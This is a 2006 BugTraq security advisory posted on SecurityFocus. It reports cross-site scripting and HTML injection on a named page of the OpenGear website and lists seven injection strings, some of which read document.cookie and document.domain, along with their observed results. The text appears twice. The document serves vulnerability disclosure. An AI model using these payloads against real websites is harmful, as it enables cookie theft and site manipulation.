BugTraq
Back to list
|
Post reply
XSS Bug in OpenGear Server Website
Apr 24 2006 02:50PM
Aditya Metaeye Org
0x0*] Advisory
==============
Web Penetrated By:- Aditya (at) Metaeye (dot) Org [email concealed]
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
========== 0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================ http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
==============
Web Penetrated By:- Aditya (at) Metaeye (dot) Org [email concealed]
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
========== 0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================ http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================
[ reply ]